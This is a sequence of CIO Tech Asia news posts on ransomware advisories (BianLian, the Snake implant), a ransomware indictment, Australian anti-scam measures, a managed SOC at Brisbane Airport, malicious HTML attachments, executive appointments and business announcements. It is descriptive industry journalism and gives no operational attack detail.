BianLian is a cybercriminal group that deals in data extortion using ransomware

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) have released a joint Cybersecurity Advisory to provide information on the BianLian ransomware and data extortion group. This advisory is part of the ongoing #StopRansomware effort, which aims to help organizations defend against ransomware attacks by sharing advisories detailing different ransomware variants and threat actors.

BianLian is a cybercriminal group that develops, deploys, and conducts data extortion using ransomware. Since June 2022, they have targeted organizations in critical infrastructure sectors in the United States and Australia, as well as professional services and property development sectors. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials and uses open-source tools and command-line scripting for reconnaissance and credential harvesting. They exfiltrate victim data using File Transfer Protocol (FTP), Rclone, or Mega. The BianLian group then extorts money by threatening to release the stolen data unless a ransom is paid. Initially, they employed a double-extortion model where they encrypted victims’ systems after exfiltrating the data, but they have since shifted primarily to exfiltration-based extortion.

The advisory includes known tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) associated with the BianLian ransomware and data extortion group. It encourages critical infrastructure organizations, as well as small- and medium-sized organizations, to implement the mitigation recommendations provided in the advisory to reduce the likelihood and impact of BianLian and other ransomware incidents.

For more information on BianLian and other ransomware threats, as well as access to no-cost resources, organizations can visit the stopransomware.gov website and review the #StopRansomware advisories.

Tags: BianLiancyber

The post #StopRansomware: BianLian Ransomware Group appeared first on CIO Tech Asia.

With many opportunities for people with disabilities

Waton Securities has formed a partnership with the CanYou Group to establish an online customer service center in Shenzhen, China, aimed at providing job opportunities and employment training support for people with disabilities in the finance industry. The CanYou Group, a comprehensive platform for barrier-free social services, has a track record of achieving stable employment for over 5,000 people with disabilities across China. Waton Securities, a financial technology enterprise, is dedicated to promoting inclusive finance and supporting charitable and public welfare endeavors.

The collaboration between Waton Securities and the CanYou Group reflects the growing need to integrate people with disabilities into the job market, considering the advancements in innovative technologies. Despite the progress made, individuals with disabilities still encounter obstacles in accessing employment resources. Overcoming these challenges requires collective efforts from enterprises and society as a whole.

By combining their resources and expertise, Waton Securities and the CanYou Group aim to facilitate employment opportunities for people with disabilities. Waton Securities remains committed to exploring new models and approaches to support vulnerable groups, leveraging financial technology to create a more equitable world for their customers, employees, and society at large.

Tags: ChinaPrnasiaWaton Securities

The post Waton Securities dedicated to fostering employment appeared first on CIO Tech Asia.

BNE has valuable assets to protect from increasingly frequent and sophisticated cyberattacks

Brisbane Airport Corporation (BAC) operates Brisbane Airport (BNE), a vital part of Australia’s critical infrastructure that helps employ thousands of Queenslanders and contributes more than $US4 billion to the economy. The third-largest airport in the country by passenger numbers, BNE operates 24/7, connecting people and products with 76 domestic and international destinations.

There are more than 425 businesses at the airport precinct that employ over 24,000 people. BNE is also the largest airport in Australia by land size, covering 2,700 hectares. It’s even classified as a suburb with its own postcode.

All this means BNE has valuable assets to protect from increasingly frequent and sophisticated cyberattacks, including passenger management, staff management, air traffic control and emergency response systems.

Due to significant business disruptions caused by the COVID-19 pandemic, BAC was looking for a partner to manage its cybersecurity-related business risks. In particular, the company wanted to modernise its existing Splunk security information and event management (SIEM) solution into a holistic Managed Security Operations Centre (SOC) that provided end-to-end protection across its technology environment.

Recent amendments to Australia’s Security of Critical Infrastructure Act 2018, as well as aviation security requirements, acted as a catalyst for BAC to implement a Managed detection and response (MDR) service to reduce the impact and severity of malicious and progressively more complex cybersecurity incidents. This MDR service also needed to be ‘sovereign’, meaning it was hosted and managed entirely within Australia.

One of BAC’s main challenges was to tune, triage and respond to cybersecurity alerts.

“The alerts we were receiving weren’t very meaningful. So, we were looking for a solution that improved alert fidelity, helped our cyber team avoid alert fatigue and enabled us to effectively counter cyberthreats.” explains Craig Johnston, ICT Services Manager at BAC.

ParaFlare partnership enables complete cyber coverage

In August 2022, BAC engaged ParaFlare, one of only two partners in Australia to achieve Microsoft’s verified Managed Extended Detection and Response solution status. As such, ParaFlare will provide a 24/7 MDR service that leverages Microsoft Sentinel, Defender for Endpoint and Defender for Identity alongside its Splunk SIEM.

Sturt Maclennan, Chief Customer Officer at ParaFlare, says the solution is significantly improving BAC’s detection and response capabilities enhanced by the native integrations of Microsoft’s security stack.

“We’ve got a security platform that gives BAC coverage from their endpoints right through to edge cases in the SIEM, all from a single specialist provider, which is unique,” he says.

Additionally, ParaFlare is providing BAC with curated threat intelligence and advanced threat-hunting services, as well as digital forensics and incident response services.

Its team of threat-hunting specialists conduct monthly exercises to challenge the assumption that the detection strategies that have been implemented are suitable for the ever-changing cyber threat landscape.

“One of our key differentiators is that we don’t just rely on the tech vendor’s tools for detection – we’ve also created our own library of custom detections,” says Maclennan.

Meanwhile, ParaFlare’s Digital Forensics and Incident Response team, which specialises in investigation and remediation, works alongside its MDR team to ensure a smooth transition and continuity of service in the event of a cybersecurity breach.

Reducing dwell time and generating high fidelity alerts

BAC went live with the SOC in October 2022 following a rapid and comprehensive onboarding process with ParaFlare, resulting in immediate 24/7 eyes on glass.

While it’s still early days, the MDR service has already reduced the time between when a cyberattack occurs and when it’s detected for a priority one (or critical) case to within 15 minutes.

“Being able to receive meaningful alerts gives us a much greater level of end-to-end protection with cyber sovereignty,” says Johnston.

Maclennan says ParaFlare is proud to be partnering with BAC to protect an important part of Australia’s critical infrastructure.

Tags: Brisbane airportBrisbane Airport CorporationMicrosoft

The post Brisbane Airport Corporation scales up its security operations appeared first on CIO Tech Asia.

The attacks targeted law enforcement agencies and other vital sectors

The Justice Department has unsealed two indictments charging a Russian national named Mikhail Pavlovich Matveev with using three different ransomware variants to attack numerous victims in the United States. Matveev, also known as Wazawaka, m1x, Boriselcin, and Uhodiransomwar, allegedly participated in conspiracies to deploy LockBit, Babuk, and Hive ransomware variants and transmitted ransom demands in connection with each. The attacks targeted law enforcement agencies, healthcare organizations, and other sectors, with total ransom demands amounting to as much as $US400 million, and victim ransom payments reaching up to $US200 million.

Matveev’s alleged involvement includes deploying LockBit ransomware against a law enforcement agency in Passaic County, New Jersey, in June 2020, deploying Hive against a nonprofit behavioral healthcare organization in Mercer County, New Jersey, in May 2022, and deploying Babuk against the Metropolitan Police Department in Washington, D.C., in April 2021.

Assistant Attorney General Kenneth A. Polite, Jr. emphasized the need for a coordinated response to such international cybercrimes, and U.S. Attorney Philip R. Sellinger for the District of New Jersey stated the charges serve as a reminder to cybercriminals that they will be brought to justice. U.S. Attorney Matthew M. Graves for the District of Columbia stressed the commitment to prosecute and punish offenses targeting key institutions and individuals.

The LockBit ransomware variant, which Matveev is accused of using, has executed over 1,400 attacks globally, issuing over $US100 million in ransom demands and receiving over $US75 million in ransom payments. Similarly, the Babuk ransomware variant has executed over 65 attacks, issuing over $US49 million in ransom demands and receiving as much as $US13 million in ransom payments. The Hive ransomware group, in which Matveev allegedly participated, has targeted over 1,400 victims worldwide and received as much as $US120 million in ransom payments.

The ransomware attacks generally involved gaining unlawful access to vulnerable computer systems, deploying the ransomware, encrypting, and stealing data, sending ransom demands, and negotiating ransom amounts. Failure to pay often resulted in the public release of the victim’s data on data leak sites.

Matveev is charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, he could face over 20 years in prison.

The case is being investigated by the FBI Newark Field Office’s Cyber Crimes Task Force, with assistance from various domestic and international partners. The Department of the Treasury’s Office of Foreign Assets Control has also designated Matveev for his role in launching ransomware attacks, and the Department of State is offering a reward of up to $US10 million for information leading to his arrest and/or conviction.

Tags: RussiaUS government

The post Russian national charged with ransomware attacks appeared first on CIO Tech Asia.

Kissner brings a wealth of expertise to Lacework

Lacework, a data-driven cloud security company, has announced the appointment of Lea Kissner as its new Chief Information Security Officer (CISO). Kissner will be responsible for leading the development and implementation of Lacework’s security strategy and programs.

With over 20 years of experience in leading security, privacy, and anti-abuse efforts, Kissner brings a wealth of expertise to Lacework. They have previously served as CISO at Twitter, Chief Privacy Officer at Humu, and Global Lead of Privacy Technology at Google. Kissner also worked as a Security and Privacy consultant for Zoom, addressing security concerns during the surge in usage amid the COVID-19 pandemic.

Kissner’s role as CISO at Lacework aligns with the company’s expansion in the cloud security market. Lacework has been growing its leadership team, with recent appointments including Andrew Casey as CFO and Meagen Eisenberg as CMO.

Jay Parikh, CEO of Lacework, expressed confidence in Kissner’s ability to understand the challenges faced by modern CISOs and the value they bring to organizations. Kissner’s experience will help Lacework deliver a world-class cloud security platform and serve customer CISOs effectively. The company aims to secure the cloud as more enterprises expand their cloud environments.

Kissner shared their excitement about joining Lacework and contributing to the mission of securing the cloud. Their passion for building respectful and secure products aligns with Lacework’s data-driven approach to cloud security, which enables customers to leverage the benefits of the cloud while ensuring robust protection.

Tags: LaceworkPrnasia

The post Lacework appoints new chief information security officer appeared first on CIO Tech Asia.

ACCC welcomes funding

The Australian Competition and Consumer Commission (ACCC) has expressed its support for the establishment of the National Anti-Scam Centre (NASC) by the Australian Government. The recently announced budget allocated $US58 million to the ACCC for the setup of the NASC over the next two years.

The funding will be used to develop the necessary technology infrastructure for high-frequency data sharing with various agencies, law enforcement, and the private sector. The goal is to make Australia a more difficult target for scammers. The NASC will bring together expertise and resources to disrupt scammers’ contact with Australians, raise consumer awareness about avoiding scams, and connect scam victims with appropriate services.

By sharing scam reports and implementing other initiatives, the NASC will provide valuable insights to the finance, telecommunications, and digital platforms sectors, enabling them to take timely and effective measures to prevent scams. The NASC will be phased in from July 1, 2023, with the development of data-sharing technology taking place over the next three years.

Additionally, the NASC will establish fusion cells to coordinate efforts between the government and the private sector to combat specific scam activities more effectively. This enhanced coordination and focus will help target anti-scam activities and reduce losses to scams.

During its initial year of operation, the NASC will collaborate closely with the Australian Securities and Investments Commission (ASIC) to deliver a scam website takedown service and support the Australian Communications and Media Authority (ACMA) in combating telecommunications scams.

The ACCC welcomes the government’s commitment to introducing an SMS Sender ID register, similar to Singapore’s, which will aid in disrupting impersonation scams and help consumers verify the authenticity of text messages.

While these steps are positive in the fight against scams, the ACCC emphasizes the need for effective cross-industry standards to prevent scammers from exploiting weak links. The ACCC has been consulting on the future work of the NASC since receiving seed funding in October 2022, with the aim of better protecting consumers from scams through increased coordination across government, finance and telecommunications sectors, and digital platforms.

Tags: ACCCAnti-scamNASC

The post Establishing a National anti-scam centre appeared first on CIO Tech Asia.

ACMA investigations found 3 telco provides that were guilty

The Australian Communications and Media Authority (ACMA) has taken action against a number of telcos after compliance failures were used by scammers to send SMS road toll, Medicare and Australia Post impersonation scams to consumers.

ACMA investigations found Sinch Australia Pty Ltd (Sinch), Infobip Information Technology Pty Ltd (Infobip) and Phone Card Selector Pty Ltd (Phone Card) allowed SMS to be sent using text-based sender IDs without sufficient checks to ensure they were being used legitimately.

The ACMA found Infobip allowed 103,146 non-compliant SMS to be sent, which included scams impersonating well known Australian road toll companies. Sinch allowed 14,291 non-complaint SMS, which included Medicare and Australia Post impersonation scams.

Phone Card was also found to have inadequate systems in place to comply with the rules, however there is no evidence that scammers exploited the opportunities it created.

Text-based sender IDs can be used by scammers to pose as legitimate organisations such as government agencies, banks, and road toll companies. Under the Reducing Scam Calls and Scam SMS Code, Australian telcos must obtain evidence from customers that they have a legitimate reason to use text-based sender IDs (such as business names) in SMS.

ACMA Chair Nerida O’Loughlin said the investigations showed scammers will readily take advantage of vulnerabilities created by telcos.

“While there is no suggestion the telcos were involved in scam activity themselves, scammers have used their failures to prey on Australians. This wouldn’t have happened if the companies had adequate processes in place and complied with the rules,” she said.

“Scams that impersonate reputable organisations can be particularly hard for consumers to recognise and there’s no telling how much damage could have been done as a result of these scam texts.”

The ACMA has given Sinch and Infobip formal directions to comply with the obligations, the strongest enforcement action available for code breaches. Phone Card has been given a formal warning.

Combating SMS and identity theft phone scams is an ACMA compliance priority and telcos may face penalties of up to $US250,000 for breaching ACMA directions to comply with the code.

The ACMA has also welcomed the Federal Government’s announcement that the agency will develop an SMS sender ID register to help prevent offshore scammers impersonating trusted brands and government agencies.

“This initiative will help close a key vulnerability used by scammers. The ACMA looks forward to working with industry and trusted brands as we implement this new protection,” Ms O’Loughlin said.

Tags: ACMAAustralia

The post Telcos breached for allowing SMS scams appeared first on CIO Tech Asia.

Tool used by Russia’s Federal Security Service

The Australian Cyber Security Centre has released a Joint Cybersecurity Advisory with its international partners on the Snake implant. The Snake implant is a sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service for long-term intelligence collection on sensitive targets.

The Australian Cyber Security Centre has identified Snake infrastructure in over 50 countries; its targeting is purposeful and tactical, designed to collect intelligence from high-priority targets, such as government networks, research facilities, and journalists.

This Cybersecurity Advisory provides background on Snake’s attribution and detailed descriptions of the implant’s host architecture and network communications.

The technical information and mitigation recommendations provided are designed to assist network defenders in detecting Snake and associated activity. The Snake implant is considered the most sophisticated cyber espionage tool developed and used by Center 16 of Russia’s Federal Security Service (FSB) for long-term intelligence collection on sensitive targets.

To conduct operations using this tool, the FSB created a covert peer-to-peer (P2P) network of numerous Snake-infected computers worldwide. Many systems in this P2P network serve as relay nodes that route disguised operational traffic to and from Snake implants on the FSB’s ultimate targets.

Snake’s custom communications protocols employ encryption and fragmentation for confidentiality and are designed to hamper detection and collection efforts. We have identified Snake infrastructure in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, including the United States and Russia. Although Snake uses infrastructure across all industries, its targeting is purposeful and tactical.

Globally, the FSB has used Snake to collect sensitive intelligence from high-priority targets, such as government networks, research facilities, and journalists.

As one example, FSB actors used Snake to access and exfiltrate sensitive international relations documents and other diplomatic communications from a victim in a North Atlantic Treaty Organization (NATO) country.

The FSB has victimised industries within the United States, including education, small businesses, media organisations, and critical infrastructure sectors, including government facilities, financial services, critical manufacturing, and communications.

This Cybersecurity Advisory (CSA) provides background on Snake’s attribution to the FSB and detailed technical descriptions of the implant’s host architecture and network communications. This CSA also addresses a recent Snake variant that has not yet been widely disclosed.

The technical information and mitigation recommendations in this CSA are provided to assist network defenders in detecting Snake and associated activity.

For more information on FSB and Russian state-sponsored cyber activity, please see the joint advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and CISA’s Russia Cyber Threat Overview and Advisories webpage. Introduction What is Snake? We consider Snake the most sophisticated cyber espionage tool in the FSB’s arsenal.

The sophistication of Snake stems from three principal areas. First, Snake employs means to achieve a rare level of stealth in its host components and network communications. Second, Snake’s internal technical architecture easily incorporates new or replacement components.

This design also facilitates the development and interoperability of Snake instances running on different host operating systems. We have observed interoperable Snake implants for Windows, MacOS, and Linux operating systems. Lastly, Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs, given its complexity.

Following open-source reporting by cybersecurity and threat intelligence companies on Snake tactics, techniques, and procedures (TTPs), the FSB implemented new techniques to evade detection. The modifications to the implant enhanced challenges in identifying and collecting Snake and related artifacts, directly hampering detection from both host- and network-based defensive tools.

The effectiveness of this type of cyber espionage implant depends entirely on its long-term stealth since the objective of an extended espionage operation involves remaining on the target for months or years to provide consistent access to important intelligence. The uniquely sophisticated aspects of Snake represent a significant effort by the FSB over many years to enable this type of covert access.

The FSB began developing Snake as “Uroburos” in late 2003. Development of the initial versions of the implant appeared to be completed around early 2004, with cyber operations first conducted using the implant shortly after that.

The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment, even after public disclosures, instead of abandoning it. The name appears throughout early versions of the code, and the FSB developers also left other unique strings, including “Ur0bUr()sGoTyOu#”, which have publicly returned to haunt them.

Unique features in early versions of Uroburos included a low-resolution image of a portion of a historical illustration of an Uroboros by the German philosopher and theologian Jakob Böhme. One approach to a tertiary backdoor used this image as the key. The same image had also been embedded in other Snake-related components. The image, blown up to a higher resolution, is shown right.

In addition, early FSB developers of the Snake implant left portions of unique code throughout the implant, which revealed inside jokes, personal interests, and taunts directed at security researchers. For instance, the “Ur0bUr()sGoTyOu#” string referenced above was replaced with “gLASs D1cK” in 2014 following some of the public cybersecurity reporting.

Snake operations have been attributed to an available unit within Center 16 of the FSB. This unit more broadly operates the numerous elements of the Turla2 toolset and has subunits spread throughout Russia reflecting historical KGB signals intelligence operations in the Soviet Union.

Snake has been a core component of this unit’s operations for almost as long as Center 16 has been part of the FSB.3 The extensive influence of Snake across the Turla toolset demonstrates its impact on practically every aspect of the unit’s modern era of cyber operations. Daily operations using Snake have been carried out from an FSB facility in Ryazan, Russia, with an increase in Snake activity during FSB working hours in Ryazan, approximately 7:00 AM to 8:00 PM, Moscow Standard Time (GMT+3).

The leading developers were Ryazan-based FSB officers known by monikers included in the code of some versions of Snake. In addition to developing Snake, Ryazan-based FSB officers used it to conduct worldwide operations; these operations differed from others launched from Moscow or other FSB sites based on infrastructure and techniques. While the development and re-tooling of Snake have historically been done by Ryazan-based FSB officers, Snake operations were also launched from an FSB Center 16-occupied building in Moscow.

According to the ACSC, the investigations have identified examples of FSB operators using Snake to their full potential and FSB operators who appeared unfamiliar with Snake’s more advanced capabilities. These observations illustrate the difficulty in using such an advanced toolset across the various geographically dispersed teams comprising this unit within FSB Center 16.

ACSC has been collectively investigating Snake and Snake-related tools for almost 20 years, and other operations by this unit since the 1990s. During that time, the FSB has used Snake in many different operations. They have demonstrated the value placed in this tool by making numerous adjustments and revisions to keep it viable after repeated public disclosures and other mitigations.

Snake’s code and multiple Snake-related tools have been either a starting point or a key influence factor for a diverse range of other highly prolific implants and operational tools in the Turla family. Most notably, this has included Carbon (aka Cobra)—derived from Snake’s code base—and the similarly Snake-adjacent implant Chinch (currently known in open sources as ComRAT).

ACSC has identified Snake infrastructure in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, including the United States and Russia. Although Snake leverages infrastructure across all industries, its targeting is purposeful and tactical. For instance, if an infected system did not respond to Snake communications, the FSB actors would strategically re-infect it within days.

Globally, the FSB has used Snake to collect sensitive intelligence from high-priority targets, such as government networks, research facilities, and journalists. As one example, FSB actors used Snake to access and exfiltrate sensitive international relations documents and other diplomatic communications from a victim in a NATO country.

Within the United States, the FSB has victimised industries, including education, small businesses, media organisations, and critical infrastructure sectors, including government facilities, financial services, critical manufacturing, and communications. Other Tools and TTPs Employed with Snake The FSB typically deploys Snake to external-facing infrastructure nodes on a network and, from there, uses other tools and TTPs on the internal network to conduct additional exploitation operations.

Upon gaining and cementing ingress into a target network, the FSB typically enumerates the network and works to obtain administrator credentials and access domain controllers. Various mechanisms have been employed to gather user and administrator credentials to expand laterally across the network, including keyloggers, network sniffers, and open-source tools.

Typically, after FSB operators map out a network and obtain administrator credentials for various domains in the network, regular collection operations begin. In most instances with Snake, further heavyweight implants are not deployed, and they rely on credentials and lightweight remote-access tools internally within a network. FSB operators sometimes deploy a small remote reverse shell and Snake to enable interactive operations.

This triggerable reverse shell, which the FSB has used for around 20 years, can be used as a backup access vector or to maintain a minimal presence in a network and avoid detection while moving laterally.

Snake Architecture Snake’s architectural design reflects professional software engineering practices. Critical pathways within the implant are stacks of loosely coupled components that implement well-designed interfaces. In addition to facilitating software development and debugging, this construction allows Snake to use multiple components for the same purpose, choosing the specific component based on environmental considerations.

For example, Snake’s custom network communications protocols function as a stack. All implementations use encryption and transport layers, such as Snake’s custom HTTP or raw TCP socket protocol. Each Snake network protocol stack layer solely implements a specified interface for operability with the two adjacent layers.

The encryption layer and underlying transport layer thus function independently, so any custom Snake network protocol can employ an encryption overlay without any change to the encryption layer code.[4] This modularity allows Snake operators to choose the most logical network transport for the given environment without affecting Snake’s other functionality.

When using a compromised HTTP server as part of the Snake P2P network, the operators can ensure that all traffic to this machine follows the Snake custom HTTP protocol and blends effectively with legitimate traffic.

In the context of a compromised machine that legitimately allows secure shell (SSH) connections, Snake can utilise its custom raw TCP socket protocol instead of its custom HTTP protocol. All other layers of the Snake protocol stack, from the immediately adjacent transport encryption layer to the distant command processing layer, can and do remain entirely agnostic to the transport layer as long as it implements its interface correctly.

This architecture also allows the Snake developers to easily substitute a new communications protocol when they believe one has been compromised without necessitating any downstream changes in the code base.

Lastly, this design facilitates the development of fully interoperable Snake implants running on different host operating systems. Snake’s technical sophistication extends from the software architecture to lower-level software implementation.

Original versions of Snake were developed as early as 2003 before many of the modern programming languages and frameworks that facilitate this type of modular development were available. Snake is written entirely in C, which provides significant advantages in low-level control and efficiency but does not provide direct support for objects or interfaces at the language level and provides no assistance with memory management.

The developers of Snake successfully implemented the implant’s complex design in C with very few bugs, including careful avoidance of the common pitfalls associated with null-terminated strings and the mixing of signed and unsigned integers. Additionally, the developers demonstrate an understanding of computer science principles throughout the implant’s implementation.

This includes selecting and correctly coding asymptotically optimal algorithms, designing and utilising efficient custom encoding methodologies that closely resemble common encoding schemes, and securely handling the numerous possible errors associated with systems-level programming. Capitalising on Mistakes Although the Snake implant is a highly sophisticated espionage tool, it does not escape human error.

A tool like Snake requires more familiarity and expertise to use correctly, and in several instances, Snake operators should have used it more effectively. Various mistakes in its development and operation provided us with a foothold into the inner workings of Snake. They were key factors in developing capabilities that have allowed for tracking Snake and manipulating its data.

The FSB used the OpenSSL library to handle its Diffie-Hellman key exchange. The Diffie-Hellman key set created by Snake during the key exchange needs to be longer to be secure. The FSB provided the function DH_generate_parameters with a prime length of only 128 bits, which is inadequate for asymmetric key systems.

Also, in some instances of what appeared to be rushed deployments of Snake, the operators should have stripped the Snake binary. This led to the discovery of numerous function names, cleartext strings, and developer comments, as seen in the following figure.

Tags: ACSCRussia

The post ACSC issues joint Advisory on Russian ‘Snake’ Cyber Espionage Tool” appeared first on CIO Tech Asia.

HTML attacks can be tricky to detect

Businesses in Asia-Pacific could find themselves vulnerable to attack via HTML attachment, as the proportion of malicious files doubles in less than 12 months, according to the most recent Threat Spotlight from Barracuda, a trusted partner and leading provider of cloud-enabled security solutions.

Analysing millions of messages and files scanned by Barracuda’s security technologies in APAC and across the globe, the new report shows how in March 2023 just under half (45.7 per cent) of all HTML attachments scanned by Barracuda were malicious, more than double the proportion (21 per cent) reported in May last year.

HTML stands for Hypertext Markup Language and is used to create and structure content that is displayed online. It is also used in email communication – for example in automated newsletters, marketing materials, and more. In many cases, reports are attached to an email in HTML format (with the file extension .html, .htm or .xhtml, for example). Attackers can successfully leverage HTML as an attack technique in phishing and credential theft or for the delivery of malware.

According to Barracuda’s Threat Spotlight, not only is the overall volume of malicious HTML attachments increasing, but almost a year on from Barracuda’s last report, HTML attachments remain the file type most likely to be used for malicious purposes.

HTML attacks can be tricky to detect, as instead of hackers having to include malicious links in the body of an email, which would be detected, attackers instead work to embed HTML attachments within emails disguised as weekly reports and other generic work email types, as a way to trick users into clicking on phishing links. From there, user credentials can be phished by a third-party machine, whether via a phishing site or a phishing form embedded in the attachment.

“The security industry has been highlighting the trend of cybercriminals weaponising HTML for years – and evidence suggests it remains a successful and popular attack tool,” said Fleming Shi, Chief Technology Officer, Barracuda.

“Getting the right security in place is as important now as it has ever been. This means having effective, AI-powered email protection in place that can evaluate the content and context of an email beyond scanning links and attachments. Other important elements include implementing robust multifactor authentication or – ideally – Zero Trust Access controls; having automated tools to respond to and remediate the impact of any attack; and training people to spot and report suspicious messages.”

Tags: Asia PacificBarracudaHTML

The post Malicious HTML attachments double since 2022 appeared first on CIO Tech Asia.

1000minds uses explicit criteria and explicit human judgments

1000minds has launched an AI assistant as part of its decision-making and conjoint analysis software using Microsoft Azure OpenAI services. OpenAI’s GPT technology is also used in the popular ChatGPT service.

The 1000minds AI assistant helps people build their decision model while keeping them in the driver’s seat, which is incredibly useful for learning how to use 1000minds and for testing its use in new domains.

For example, if people are comparing electric cars, the AI assistant will suggest criteria such as recharge time, speed, safety, and distance, and optionally provide examples of electric cars to consider.

1000minds’ commitment to AI safety best practices, including a “human-in-the-loop” approach, means that people are involved every step of the way. With just a few words about what they want to compare, e.g., “electricity generation options” or “candidates for head of HR”, the AI assistant generates suggestions that people can adapt to meet their needs by incorporating their own knowledge and expertise.

It’s the perfect marriage: 1000minds’ structured decision-making combined with the OpenAI language model, which works well for this kind of application given well-framed prompts designed to get good suggestions.

The AI assistant also supports ideation with 1000minds’ expert group decision-making tools, and builds models for conjoint analysis, discrete choice experiments and preferences surveys.

Unlike “opaque” AI-based decision-making, in which the reasoning behind a decision can’t be fully explained, 1000minds uses explicit criteria and explicit human judgments. This creates a fully auditable, defensible, and refinable decision model that can be trusted.

“Combining 1000minds’ PAPRIKA algorithm and OpenAI’s GPT, two incredible technologies, is a brilliant idea,” said Colin Smithies, Business Intelligence Analyst at Te Herenga Waka – Victoria University of Wellington. “1000minds has always been very powerful and user-friendly, and now getting AI help with specifying the criteria for your decision is extremely helpful. It’s fantastic!”

Tags: 1000mindsMicrosoftPrnasia

The post Keeping humans in charge of AI decision-making appeared first on CIO Tech Asia.